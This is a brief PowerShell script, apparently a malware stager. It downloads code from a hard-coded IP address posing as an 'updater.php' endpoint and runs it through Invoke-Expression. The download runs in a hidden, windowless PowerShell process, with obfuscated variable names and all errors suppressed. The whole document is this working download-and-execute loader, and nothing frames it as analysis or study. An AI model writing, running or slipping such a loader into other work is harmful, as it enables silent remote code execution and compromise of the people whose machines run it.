try { $exDGzmBTLcipqJf = @' try { $checkResult = Invoke-WebRequest -Uri "http://172.94.9.52/updater.php" -UseBasicParsing Invoke-Expression $checkResult.Content } catch { } '@ $JPgAZnpXu = New-Object System.Diagnostics.ProcessStartInfo $JPgAZnpXu.FileName = "powershell.exe" $JPgAZnpXu.Arguments = "-Command " + [char]34 + $exDGzmBTLcipqJf + [char]34 $JPgAZnpXu.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden $JPgAZnpXu.CreateNoWindow = $true $JPgAZnpXu.UseShellExecute = $false $kgMFnyYNPi = New-Object System.Diagnostics.Process $kgMFnyYNPi.StartInfo = $JPgAZnpXu $kgMFnyYNPi.Start() | Out-Null } catch { }